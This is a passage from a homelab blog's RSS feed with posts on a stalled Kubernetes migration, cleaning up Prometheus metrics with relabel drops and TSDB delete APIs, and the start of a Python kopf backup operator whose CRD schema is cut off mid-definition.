And I&rsquo;ve realized today that it&rsquo;s been almost a year since I made the decision
to switch over to Kubernetes for my Homelab.
On the 17th of August 2023, I posted about <a href="https://blog.mei-home.net/posts/hashipocalypse/">the HashiPocalypse</a>.</p>
<p>Back then, I laid out my thoughts about HashiCorp&rsquo;s decision to switch all of
their tools, almost all of which I&rsquo;m currently using in my Homelab, to the
BSL license.
Back then, I only announced it as an experiment, but it has become a migration
at this point.</p>
<p>I really started the migration in mid-December 2023, so it hasn&rsquo;t really been
almost a year. The first months went pretty well and I got a lot of the initial
setup and infrastructure into place. At the end of April, I was finally done
with all of the infrastructure, from Ceph Rook for storage to kube-prometheus-stack
for metrics. On the 28th of April, I migrated the first piece of what I&rsquo;d call
&ldquo;real workload&rdquo; over, my <a href="https://www.audiobookshelf.org/">Audiobookshelf</a> server.
This then served me as a test bed, first of all for my workload template, but
also for my backups, which came next.</p>
<p>And that&rsquo;s where the problems started, when I finally realized that k8s doesn&rsquo;t
have a combination of <a href="https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/">CronJobs</a>
and <a href="https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/">DaemonSets</a>.
That&rsquo;s a problem because my current backup setup, on my Nomad cluster, uses such
a type of job to run my backups on every node.</p>
<p>But fear not, I thought: I know Python, I know how to access an API, we&rsquo;re just
going to write our own operator for backups!</p>
<p>And that was a mistake, in hindsight. Don&rsquo;t get me wrong, I will still continue
working on the operator, but starting to write it was a mistake. Because I know
how programming projects generally go when I&rsquo;m working on them alone.
My intro of Nomad to my Homelab was delayed by about half a year because I
decided I don&rsquo;t like the Nomad CLI and wanted something more like docker-compose.
So I got out the Python and wrote it. And it took ages.</p>
<p>This same thing has also happened here. It&rsquo;s not really a complicated implementation.
But it&rsquo;s about my backups, so I want to do it properly. But the project is getting
dragged out, and I&rsquo;m not sure why. The motivation isn&rsquo;t the same as it was while
doing all of the infra setups at the beginning of the year. I averaged about one
commit per week, if that much, now.</p>
<p>The problem is: I really need to get going with the migration. Maintaining what
amounts to two different Homelabs, both hosting important things, is getting a
bit too much.
I mean, will I give up on the plan to implement my backup operator? No, of course
not. Sunk cost fallacy and all that.
But I definitely wish I hadn&rsquo;t started. I would be way farther ahead. I just
need to find where the heck my motivation has gotten to. Perhaps it&rsquo;s just the
summer? My motivation has generally been pretty low when the simple act of typing
a bit more vigorously would already make me break out in a sweat. I really
strongly dislike summer, and I&rsquo;m very much ready for this year&rsquo;s to be over
and done with.</p>
<p>And it has a little bit to do with the ridiculousness of how I write software.
First of all, the first couple of weeks are spend writing very copious amounts
of notes. Making diagrams. Spending way more time on project/tooling setup than
is at all reasonable. And then the tests. The ratio of UT code to production code
is ridiculous. I couldn&rsquo;t write a prototype or MVP if my life depended on it.</p>
<p>So if any one of you meets my motivation, please send it back to me! It will be
the middle-aged guy who looks like his beard really shouldn&rsquo;t be gray yet. You
will recognize it by the large amount of grumbling going on.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Prometheus Metrics Cleanup</title>
      <link>https://blog.mei-home.net/posts/prometheus-metrics-cleanup/</link>
      <pubDate>Fri, 28 Jun 2024 21:58:20 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/prometheus-metrics-cleanup/</guid>
      <description>Dropping metrics during scraping and deleting series from the DB</description>
      <content:encoded><![CDATA[<p>I had to clean up my Prometheus data, and it got pretty darned close there.</p>
<p>When it comes to my metrics, I&rsquo;m very much a data hoarder. Metrics gathering
was what got me into Homelabbing as a hobby, instead of just a means to an end.
Telegraf/Influx/Grafana were the first new services on my Homeserver in about
five years. And I really do like looking at my dashboards, including looking at
past data. My retention period currently is five years. And I&rsquo;m already pretty
sure that when I come up to those five years for the initial data, I will just
extend that to 10 years. &#x1f605;</p>
<p>But back in the beginning of June, I hit the 98.5% utilization for the Ceph RBD
which was housing my <a href="https://prometheus.io/">Prometheus</a> TSDB. The volume has
100 GB of available space. And it was full. I migrated Prometheus to my new
k8s cluster <a href="https://blog.mei-home.net/posts/k8s-migration-9-prometheus/">back in March</a>.
In the same setup, I also deployed <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>,
to gather the data from my k8s cluster. At the same time, I&rsquo;m still gathering
data from my Nomad/Consul cluster. I&rsquo;m also gathering data from two Ceph clusters.
One being my old baremetal cluster, and one being my new Ceph Rook cluster.
Since the k8s migration started, I&rsquo;m also gathering data for eight additional
hosts. Plus the data from the k8s cluster itself. That additional data has had
quite some impact. Here is the growth of the utilization of the volume storing
the Prometheus TSDB:</p>
<figure>
    <img loading="lazy" src="utilization.png"
         alt="A Grafana time series plot. It shows time, starting from 3rd of March through to June 26th on the x axis, and volume utilization in percent on the y axis. The curve starts at around 50% in the beginning of March and very consistently rises up to about 100% by June eighth. On June eighth, there is a strong drop to 72%, then some jitter and a final drop to 69% around June tenth. After that, the curve steadily grows again, although at a lower rate than before."/> <figcaption>
            <p>Storage volume utilization of the TSDB</p>
        </figcaption>
</figure>

<p>The initial 50%/50GB was the data I had gathered since around February 2021,
which was when I initially switched from Influx to Prometheus. The next 50% then
came in less than three months. It was clear that I had to slow down the rate
of growth.</p>
<p>And so I embarked on a project to drop uninteresting metrics from scraping and
deleting the data for those metrics already in Prometheus.
My main guidance for this action was <a href="https://tanmay-bhat.github.io/posts/how-to-drop-and-delete-metrics-in-prometheus/">this blog post</a>.</p>
<h2 id="figuring-out-what-to-keep-and-what-to-drop">Figuring out what to keep and what to drop</h2>
<p>The first step was to take inventory. Tanmay was describing a method to find
the most costly metrics in their post, but I wasn&rsquo;t really after costly metrics,
just ones I knew I was not interested in now and probably would never be interested
in in the future. This took some thinking, because what if I suddenly realized
a metric is super interesting but don&rsquo;t have five years worth of data on it?!</p>
<p>The horror! &#x1f631;</p>
<p>But before I could start, I had to port-forward the Prometheus port to my
local machine, because Prometheus is not directly accessible outside the cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl port-forward -n monitoring prometheus-monitoring-kube-prometheus-prometheus-0 28015:9090
</span></span></code></pre></div><p>First step, getting all the metric series currently in the TSDB:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>curl http://localhost:28015/api/v1/label/__name__/values | tr <span style="color:#e6db74">&#39;,&#39;</span> <span style="color:#e6db74">&#39;\n&#39;</span> | tr -d <span style="color:#e6db74">&#39;&#34;&#39;</span> &gt; all.txt
</span></span></code></pre></div><p>This produces a list with all of the series names, like this:</p>
<pre tabindex="0"><code>apiserver_client_certificate_expiration_seconds_bucket
apiserver_client_certificate_expiration_seconds_count
apiserver_client_certificate_expiration_seconds_sum
apiserver_current_inflight_requests
apiserver_current_inqueue_requests
</code></pre><p>This resulted in a grant total of 3455 metrics. And remember, those are entire
metrics - not unique permutations of labels!</p>
<p>Because I didn&rsquo;t have any good way to make a decision just from the series name,
I went through each and every one of them and plonked them into Grafana&rsquo;s
explore tab and looked at them.</p>
<p>In the end, I had 1279 metrics I wanted to keep, and 3176 I wanted to drop.
But before I went and deleted the series from Prometheus, I had to stop
Prometheus from scraping them. The overwhelming majority of metrics I wanted to
drop came from my Ceph clusters and the k8s cluster itself.</p>
<p>To drop a metric, you can use Prometheus&rsquo; <a href="https://prometheus.io/docs/prometheus/latest/configuration/configuration/#metric_relabel_configs">metric relabeling</a>
with the <code>drop</code> action. Let&rsquo;s say you want to drop all VolumeAttachment
metrics, you could add the following list item to the <code>metricRelabelings</code> of the
corresponding <a href="https://github.com/prometheus-operator/prometheus-operator/blob/main/Documentation/api.md#monitoring.coreos.com/v1.ServiceMonitor">ServiceMonitor</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;kube_volumeattachment_.*&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span></code></pre></div><p>It&rsquo;s important to note that this does not stop Prometheus from scraping the
metric. The metric just isn&rsquo;t written to the database, and is instead dropped.</p>
<p>I could comfortably add all the k8s metrics I wanted to drop into the <code>values.yaml</code>
for the kube-prometheus-stack Helm chart. The only thing to look out for is that
there are ServiceMonitors for each individual k8s component, e.g. kube-scheduler,
apiserver and etcd all have their own. To figure out into which ServiceMonitor
a specific metric drop belongs, it helps to look at the <code>job</code> label, which
contains the k8s component which produced the metric.
But watch out! Some metrics are actually produced by more than one component, so
check all the label values, not just the most recently scraped one.
Also look out for the names of the metrics. For example, just because a metric
starts with <code>apiserver_</code> doesn&rsquo;t necessarily mean that it is produced by the
apiserver and hence should be dropped there.</p>
<p>As I mentioned above, Ceph was the other big source of drop-able metrics. But
here, I hit a severe disappointment: As nice as rook is, it doesn&rsquo;t currently
support configuring the ServiceMonitors it creates, at all. So while I could
drop the unwanted metrics for my baremetal cluster, the same metrics are
still gathered for the Ceph Rook cluster. I will have to look into that in the
near future.</p>
<p>Overall, this was a pretty time consuming procedure, but at least at the end
I was pretty happy with the amount of metrics I was able to drop.</p>
<p>I&rsquo;ve just done another very &ldquo;rough and ready&rdquo; check, and it seems that my
dropping of metrics did not actually slow the growth down that much. Before
I started dropping all those metrics, the disk usage was growing at about 600 MB
per 24h. Now it&rsquo;s at approximately 500 MB per 24h. Not really that much gain,
to be honest.</p>
<h2 id="deleting-unwanted-metrics">Deleting unwanted metrics</h2>
<p>Deleting unwanted data in Prometheus is a two-step process. First, the unwanted
series need to be marked for deletion with the <a href="https://prometheus.io/docs/prometheus/latest/querying/api/#delete-series">Prometheus API</a>.
Once that&rsquo;s done, the metrics need to actually be deleted, again with the
<a href="https://prometheus.io/docs/prometheus/latest/querying/api/#clean-tombstones">Prometheus API</a>.</p>
<p>Because I already had the metrics to be deleted nicely listed in a file with
one metric name per line, I wrote a quick bash script to automate the deletion:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#! /bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>PROMETHEUS_SERVER<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://localhost:28015&#34;</span>
</span></span><span style="display:flex;"><span>metrics_list<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>1<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> read metric; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;</span>$metric<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  curl -X POST -g <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PROMETHEUS_SERVER<span style="color:#e6db74">}</span><span style="color:#e6db74">/api/v1/admin/tsdb/delete_series?match[]=</span><span style="color:#e6db74">${</span>metric<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> &lt;$metrics_list
</span></span><span style="display:flex;"><span>curl -X POST -g <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PROMETHEUS_SERVER<span style="color:#e6db74">}</span><span style="color:#e6db74">/api/v1/admin/tsdb/clean_tombstones&#34;</span>
</span></span></code></pre></div><p>It takes the aforementioned list and calls the series deletion API for each of
the lines in that file, assuming that each line only contains the name of a
metric to be deleted.
Once that&rsquo;s done, it calls the tombstone cleaning API, which really deletes
the series from the TSDB.</p>
<p>The first part of the script ran through perfectly fine for me. But the cleaning
of the tombstones failed:</p>
<pre tabindex="0"><code>&#34;status&#34;:&#34;error&#34;,&#34;errorType&#34;:&#34;internal&#34;,&#34;error&#34;:&#34;clean tombstones: /prometheus/01HSKJ3DX27WGS1NZTS0F87K6V: 2 errors: preallocate: no space left on device; sync /prometheus/01HZW9FS0W6JT1R0YJ1ZTH332N.tmp-for-creation/chunks/000011: file a
</code></pre><p>And no, I did not accidentally cut off the message there - that&rsquo;s all the Prom
API send. &#x1f601;
So I left it too late. Prometheus didn&rsquo;t even have enough space left on the
volume to execute the tombstone deletion.</p>
<p>Prometheus stores data in chunks on the disk, containing all the data for a
specific time period. When you delete the data, it has to open every chunk which
contains data from the metric to be removed, needs to remove the data and then
write out a new chunk. And it did not have enough space left to write out the
new chunk while not having deleted the old chunk yet.
In the end I capitulated and increased the size of the Prometheus volume again,
by another 20 GB. That was enough.
This is one of the reasons why I like to use S3 whenever I can. When I run out
of space there I just need to throw in another disk, no mucking about with
volume sizes.</p>
<p>Increasing the volume size was not entirely simple, because the PVC is controlled
not by a manually created manifest or even a Helm chart, but is instead
created by the Prometheus operator when running the <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>.
As a consequence, updating the size has to follow a specific process, which is
documented <a href="https://github.com/prometheus-operator/prometheus-operator/blob/main/Documentation/user-guides/storage.md#resizing-volumes">here</a>.
That was a pretty humiliating defeat. &#x1f626;</p>
<p>The tombstone cleanup is also pretty compute and memory intensive. Here&rsquo;s the
CPU consumption of the Prometheus container:</p>
<figure>
    <img loading="lazy" src="cpu.png"
         alt="A Grafana time series plot. It shows the time from 20:00 on one day to 12:30 on the next. On the Y axis it shows CPU utilization. There is only one curve, which starts rather constant around 0.14 and then goes up to 0.6 around 20:30. It stays there until 21:30, when it goes up to its maximum of 0.85. It stays there for 1.5h and then goes down to 0.4 for 30 minutes, until going up to 0.82 again. The utilization drops again to fluctuating between 0.53 and 0.66 at 00:30 and roughly stays there. At 12:30 the next day, it finally goes back to the initial 0.14."/> <figcaption>
            <p>CPU utilization of the Prometheus container during tombstone cleaning.</p>
        </figcaption>
</figure>

<figure>
    <img loading="lazy" src="memory.png"
         alt="A Grafana time series plot. It shows the time from 20:00 on one day to 12:30 on the next, similar to the previous plot. On the Y axis, this one shows the memory consumption in Gigabytes. There is only one curve, which starts out at around 500 MB and then goes up to around 850 MB at 20:30. It stays around that level until 00:30, when it goes up to 900 MB. Over the next couple of hours, the memory consumption constantly increases until it reaches its 1.6 GB peak around 10:00 the next morning."/> <figcaption>
            <p>Memory utilization of the Prometheus container during tombstone cleaning.</p>
        </figcaption>
</figure>

<h2 id="future-approaches">Future approaches</h2>
<p>All the above being said, the entire action was not really much of a success.
The percentage disk utilization plot I showed in the beginning looks rather
impressive, dropping the disk utilization by about 30%. But quite frankly:
That&rsquo;s mostly due to the 20 GB increase in the volume size. Not because of my
cleanup. A more realistic picture can be seen here, which is the bytes used of
the Prometheus volume up to today:</p>
<figure>
    <img loading="lazy" src="used-bytes.png"
         alt="A Grafana time series plot. It shows the time from March 31st to June 28th. The curve grows consistently from 68 GiB to 104 GiB until June 9th, where it drops to 87 GiB. Then it rises again constantly until it reaches 95 GiB on June 28th."/> <figcaption>
            <p>Used bytes on the Prometheus volume in GiB.</p>
        </figcaption>
</figure>

<p>This rate of growth isn&rsquo;t really sustainable in the current setup. I will
constantly run out of space on the volume. I could of course radically cut down
on the retention period or on the metrics scraped, but I really don&rsquo;t want to.</p>
<p>So in the near future, I will have to have a look at <a href="https://thanos.io/">Thanos</a>.
It is already supported in kube-prometheus-stack, and it can provide long term
storage in S3, which I prefer over disk volumes.</p>
<p>But that project has to wait until the k8s migration is done. I hope that I won&rsquo;t
have to repeat this action until that&rsquo;s completed.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelab Backup Operator Part II: Basic Framework</title>
      <link>https://blog.mei-home.net/posts/backup-operator-2-basic-framework/</link>
      <pubDate>Sat, 25 May 2024 19:40:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/backup-operator-2-basic-framework/</guid>
      <description>My first steps in the operator implementation with kopf</description>
      <content:encoded><![CDATA[<p>In the <a href="https://blog.mei-home.net/posts/backup-operator-1-rbac-issues/">last post</a>
of my <a href="https://blog.mei-home.net/tags/hlbo/">Backup Operator series</a>, I lamented the state
of permissions in the <a href="https://github.com/nolar/kopf">kopf</a> Kubernetes Operator
framework. After some thinking, I decided to go ahead with kopf and just accept
the permission/RBAC ugliness.</p>
<p>I&rsquo;ve just finished implementing the first cluster state change in the operator,
so I thought this is a good place to write a post about my approach and setup.</p>
<p>The journey up to now has been pretty interesting. I learned a bit about the
Kubernetes API, and a lot about how cooperative multitasking with coroutines
works in Python.</p>
<h2 id="why-write-an-entire-operator">Why write an entire operator?</h2>
<p>I&rsquo;ve already written some things about my backup setup in
<a href="https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/">the Kubernetes migration post</a>
which triggered this operator implementation.</p>
<p>Just to give a short refresher: I need to run daily backups on the persistent
volumes and S3 buckets of the services running in my Homelab. I&rsquo;m currently
doing that by launching a run-to-completion job on every one of my Nomad hosts
which backs up all the volumes which happen to be mounted on their host at the
time.
I can&rsquo;t do that in k8s, because it seems to lack a run-to-completion,
run-on-every-host type of workload. <a href="https://kubernetes.io/docs/concepts/workloads/controllers/job/">Jobs</a>
can do the run-to-completion part, and <a href="https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/">DaemonSets</a>
can do the run-on-every-host part, but there doesn&rsquo;t seem to be a workload type
which can do both in one.
And that&rsquo;s why I&rsquo;ve decided to go with writing my own operator. There are two
main benefits this approach will have, compared to my previous one. First, I
will be able to explicitly schedule the second stage of my backup, backing up
certain backups onto an external disk. Right now, I just schedule that phase an
hour after the previous one.
Second, I will be able to package the backup config for each individual service.
In my current approach, I have the definition of which volumes and buckets to
back up configured in the backup job&rsquo;s config. With the Kubernetes operator, I
will introduce a CRD that can be deployed together with each service, e.g. as
part of the Helm chart.</p>
<h2 id="overview-of-the-approach">Overview of the approach</h2>
<p>As I&rsquo;ve mentioned above, I will write the operator in Python and use the
<a href="https://github.com/nolar/kopf">kopf</a> framework to do it. This is simply
because I&rsquo;m currently familiar with three languages: C++, C and Python. And
Python is the most comfortable of the three.
Due to the RBAC problems I described <a href="https://blog.mei-home.net/posts/backup-operator-1-rbac-issues/">in my last post</a>, I briefly looked into other possibilities. But the Kubernetes ecosystem seems
to mostly live in Golang, which I haven&rsquo;t written anything in yet. And the main
goal currently is to get ahead with the Homelab migration to k8s, not to learn
yet another programming language. &#x1f642;</p>
<p>There will be a total of three custom resources the operator will look for.
The first one, HomelabBackupConfig, will be a one-per-cluster resource and
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apiextensions.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CustomResourceDefinition</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelabbackupconfigs.mei-home.net</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scope</span>: <span style="color:#ae81ff">Namespaced</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#ae81ff">mei-home.net</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">names</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabBackupConfig</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">plural</span>: <span style="color:#ae81ff">homelabbackupconfigs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">singular</span>: <span style="color:#ae81ff">homelabbackupconfig</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">versions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">v1alpha1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">served</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">schema</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">openAPIV3Schema</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;This object describes the general configuration of all backups created by the Homelab backup operator.&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">serviceBackup</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The configuration for all service level backups created by the operator instance.&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">schedule</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The schedule on which all service level backups will be executed.&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">scratchVol</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the PVC for scratch space. Needs to be a RWX volume.&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">s3BackupConfig</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Configuration for S3 access to the backup buckets.&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">s3Host</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 server hosting the backup buckets.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 credentials for the backup S3 user.&#34;</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">secretName</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the Secret containing the credentials.&#34;</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">accessKeyIDProperty</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_ACCESS_KEY_ID&#34;</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">secretKeyProperty</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_SECRET_ACCESS_KEY&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">s3ServiceConfig</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Configuration for S3 access to the service buckets which should be backed up.&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">s3Host</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 server hosting the buckets which should be backed up.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 credentials for the service S3 user.&#34;</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">secretName</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the Secret containing the credentials.&#34;</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">accessKeyIDProperty</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_ACCESS_KEY_ID&#34;</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">secretKeyProperty</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_SECRET_ACCESS_KEY&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">resticPasswordSecret</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The Secret with the Restic password for the backups.&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">secretName</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the Secret containing the password.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">secretKey</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName Secret which contains the Restic password.&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">jobSpec</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Configuration of the Job launched for each service backup.&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The container image to be used for all service Jobs.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">array</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The command handed to Job.spec.template.containers.command&#34;</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">array</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Additional entries for the containers.env list. These entries cann only be of the name,value variety. Other forms of env entries are not supported for now.&#34;</span>
